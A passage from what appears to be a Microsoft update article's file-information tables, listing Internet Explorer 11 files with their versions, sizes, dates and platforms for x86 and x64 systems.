07:49| x86 \nMicrosoft-windows-ie-internetexplorer-ppdlic.xrm-ms| Not applicable| 2,956| 23-Nov-2019| 08:21| Not applicable \nWindows feed discovered.wav| Not applicable| 19,884| 23-Sep-2018| 13:39| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 23-Sep-2018| 13:39| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 23-Sep-2018| 13:39| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 23-Sep-2018| 13:39| Not applicable \nJsprofilerui.dll| 11.0.9600.19572| 579,584| 19-Nov-2019| 07:34| x86 \nMemoryanalyzer.dll| 11.0.9600.19572| 1,399,296| 19-Nov-2019| 07:47| x86 \nMshtmldac.dll| 11.0.9600.19572| 64,000| 19-Nov-2019| 07:57| x86 \nNetworkinspection.dll| 11.0.9600.19572| 1,075,200| 19-Nov-2019| 07:29| x86 \nDesktop.ini| Not applicable| 65| 23-Sep-2018| 13:26| Not applicable \nOccache.dll| 11.0.9600.19572| 130,048| 19-Nov-2019| 07:30| x86 \nDesktop.ini| Not applicable| 65| 23-Sep-2018| 13:27| Not applicable \nWebcheck.dll| 11.0.9600.19572| 230,400| 19-Nov-2019| 07:24| x86 \nIcrav03.rat| Not applicable| 8,798| 23-Sep-2018| 13:27| Not applicable \nMsrating.dll| 11.0.9600.19572| 168,960| 19-Nov-2019| 07:33| x86 \nTicrf.rat| Not applicable| 1,988| 23-Sep-2018| 13:27| Not applicable \nIertutil.dll| 11.0.9600.19572| 2,304,000| 19-Nov-2019| 07:56| x86 \nSqmapi.dll| 6.2.9200.16384| 228,232| 23-Nov-2019| 06:57| x86 \nIe4uinit.exe| 11.0.9600.19572| 692,224| 19-Nov-2019| 07:23| x86 \nIernonce.dll| 11.0.9600.19572| 30,720| 19-Nov-2019| 07:52| x86 \nIesetup.dll| 11.0.9600.19572| 62,464| 19-Nov-2019| 07:59| x86 \nInseng.dll| 11.0.9600.19572| 91,136| 19-Nov-2019| 07:35| x86 \nTimeline.dll| 11.0.9600.19572| 153,600| 19-Nov-2019| 07:35| x86 \nTimeline.cpu.xml| Not applicable| 3,197| 23-Sep-2018| 13:26| Not applicable \nTimeline_is.dll| 11.0.9600.19572| 124,928| 19-Nov-2019| 07:52| x86 \nVgx.dll| 11.0.9600.19572| 817,664| 19-Nov-2019| 07:33| x86 \nIeframe.dll.mui| 11.0.9600.19572| 2,066,432| 23-Nov-2019| 06:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 06:58| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,120,704| 23-Nov-2019| 06:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 06:59| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 07:00| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,063,360| 23-Nov-2019| 07:01| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,313,728| 23-Nov-2019| 07:02| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:01| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,390,016| 23-Nov-2019| 07:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:02| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,032,640| 23-Nov-2019| 08:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,584| 23-Nov-2019| 07:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:03| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,255,360| 23-Nov-2019| 07:04| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:04| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,061,312| 23-Nov-2019| 07:05| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:05| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,325,504| 23-Nov-2019| 07:06| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:06| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,019,840| 23-Nov-2019| 07:07| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:06| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,070,528| 23-Nov-2019| 07:08| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:07| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,082,304| 23-Nov-2019| 07:08| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:08| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,072| 23-Nov-2019| 07:09| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:09| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 23-Nov-2019| 07:10| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:09| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,153,984| 23-Nov-2019| 07:11| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,291,712| 23-Nov-2019| 07:12| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:11| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,283,520| 23-Nov-2019| 07:12| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:12| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,051,584| 23-Nov-2019| 07:13| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:13| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,301,440| 23-Nov-2019| 07:14| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,093,056| 23-Nov-2019| 07:15| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 07:16| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,298,880| 23-Nov-2019| 07:17| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:16| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,094,080| 23-Nov-2019| 07:17| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:17| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,316,800| 23-Nov-2019| 07:18| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,305,024| 23-Nov-2019| 07:19| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 07:20| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,277,888| 23-Nov-2019| 07:21| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:20| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,059,776| 23-Nov-2019| 07:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:21| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 23-Nov-2019| 07:22| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 07:23| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,324,480| 23-Nov-2019| 07:24| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 23-Nov-2019| 07:25| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:24| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 07:26| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:25| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 07:26| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:26| Not applicable \nIeframe.dll| 11.0.9600.19572| 13,838,336| 19-Nov-2019| 07:20| x86 \nIeframe.ptxml| Not applicable| 24,486| 19-Nov-2019| 05:34| Not applicable \nIeui.dll| 11.0.9600.19572| 476,160| 19-Nov-2019| 07:50| x86 \nIeinstal.exe| 11.0.9600.19572| 475,648| 19-Nov-2019| 07:31| x86 \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 06:58| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 06:59| Not applicable \nInetres.adml| Not applicable| 523,798| 23-Nov-2019| 07:00| Not applicable \nInetres.adml| Not applicable| 497,168| 23-Nov-2019| 07:00| Not applicable \nInetres.adml| Not applicable| 549,601| 23-Nov-2019| 07:01| Not applicable \nInetres.adml| Not applicable| 938,813| 23-Nov-2019| 07:02| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:22| Not applicable \nInetres.adml| Not applicable| 541,364| 23-Nov-2019| 07:03| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:04| Not applicable \nInetres.adml| Not applicable| 523,828| 23-Nov-2019| 07:05| Not applicable \nInetres.adml| Not applicable| 573,051| 23-Nov-2019| 07:05| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:06| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:07| Not applicable \nInetres.adml| Not applicable| 567,797| 23-Nov-2019| 07:08| Not applicable \nInetres.adml| Not applicable| 545,645| 23-Nov-2019| 07:09| Not applicable \nInetres.adml| Not applicable| 635,718| 23-Nov-2019| 07:10| Not applicable \nInetres.adml| Not applicable| 522,947| 23-Nov-2019| 07:10| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:11| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:12| Not applicable \nInetres.adml| Not applicable| 486,171| 23-Nov-2019| 07:13| Not applicable \nInetres.adml| Not applicable| 546,070| 23-Nov-2019| 07:14| Not applicable \nInetres.adml| Not applicable| 556,258| 23-Nov-2019| 07:14| Not applicable \nInetres.adml| Not applicable| 532,548| 23-Nov-2019| 07:15| Not applicable \nInetres.adml| Not applicable| 539,045| 23-Nov-2019| 07:16| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:17| Not applicable \nInetres.adml| Not applicable| 799,803| 23-Nov-2019| 07:18| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:19| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:19| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:20| Not applicable \nInetres.adml| Not applicable| 501,599| 23-Nov-2019| 07:21| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:22| Not applicable \nInetres.adml| Not applicable| 518,930| 23-Nov-2019| 07:23| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:23| Not applicable \nInetres.adml| Not applicable| 418,138| 23-Nov-2019| 07:24| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 07:25| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 07:26| Not applicable \nInetres.admx| Not applicable| 1,675,975| 25-Oct-2019| 04:30| Not applicable \nMsspellcheckingfacility.exe| 6.3.9600.19572| 668,160| 19-Nov-2019| 07:43| x86 \nJscript9.dll.mui| 11.0.9600.19572| 29,184| 23-Nov-2019| 06:58| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 06:59| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:00| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 07:02| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:03| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:04| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 27,648| 23-Nov-2019| 07:06| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:08| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:08| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,792| 23-Nov-2019| 07:09| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 23,040| 23-Nov-2019| 07:09| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 22,016| 23-Nov-2019| 07:11| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:11| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:12| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 31,232| 23-Nov-2019| 07:13| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:13| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:15| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:18| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,256| 23-Nov-2019| 07:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:20| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,384| 23-Nov-2019| 07:24| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 07:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 07:26| Not applicable \nJscript9.dll| 11.0.9600.19572| 4,112,384| 19-Nov-2019| 07:26| x86 \nJscript9diag.dll| 11.0.9600.19572| 620,032| 19-Nov-2019| 07:49| x86 \nJscript.dll| 5.8.9600.19572| 662,528| 19-Nov-2019| 07:49| x86 \nVbscript.dll| 5.8.9600.19573| 496,640| 21-Nov-2019| 02:16| x86 \n \n## Internet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19572| 1,566,720| 19-Nov-2019| 19:15| x64 \nIexplore.exe| 11.0.9600.19572| 810,584| 23-Nov-2019| 07:48| x64 \nWebcheck.dll.mui| 11.0.9600.19572| 31,744| 23-Nov-2019| 07:48| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 07:50| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:50| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:51| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:52| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:52| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 08:45| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 37,376| 23-Nov-2019| 07:53| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:54| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:55| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 38,400| 23-Nov-2019| 07:56| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:57| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:57| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:58| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:59| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 25,600| 23-Nov-2019| 08:00| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 24,576| 23-Nov-2019| 08:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:02| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:03| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 08:04| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:05| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 08:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:07| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:08| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:09| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 08:10| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 08:10| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 08:11| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 08:12| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:13| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:14| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 20,992| 23-Nov-2019| 08:14| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 08:16| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 08:16| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 46,592| 23-Nov-2019| 07:48| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:49| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:50| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:51| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 56,320| 23-Nov-2019| 07:52| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 57,856| 23-Nov-2019| 07:53| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 08:45| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:53| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:54| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:55| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 55,296| 23-Nov-2019| 07:56| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:57| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:57| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:58| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 07:59| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 08:00| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:01| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 08:01| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 08:03| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 08:03| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 08:04| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,760| 23-Nov-2019| 08:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 08:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 08:07| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 08:07| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 08:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 08:09| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 08:10| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 08:10| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 08:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 08:12| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 08:13| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 08:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:16| Not applicable \nInetcpl.cpl| 11.0.9600.19572| 2,132,992| 19-Nov-2019| 19:39| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:49| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:49| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:50| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:51| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:52| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:53| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:45| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:53| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:54| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:55| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:56| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:57| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:57| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:58| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:59| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:00| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:01| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:02| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:02| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:03| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:04| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:05| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:05| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:06| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:07| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:08| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:09| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:10| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:11| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:11| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:12| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:13| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:14| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:15| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:15| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 307,200| 23-Nov-2019| 07:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,888| 23-Nov-2019| 07:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,304| 23-Nov-2019| 07:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 07:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,008| 23-Nov-2019| 07:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 303,104| 23-Nov-2019| 07:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 282,112| 23-Nov-2019| 08:45| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 283,648| 23-Nov-2019| 07:54| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 291,840| 23-Nov-2019| 07:55| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,520| 23-Nov-2019| 07:56| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 275,968| 23-Nov-2019| 07:57| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 07:57| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,376| 23-Nov-2019| 07:58| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:59| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 258,048| 23-Nov-2019| 08:00| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 256,512| 23-Nov-2019| 08:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 08:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,256| 23-Nov-2019| 08:02| Not applicable \nMshtml.dll.mui| 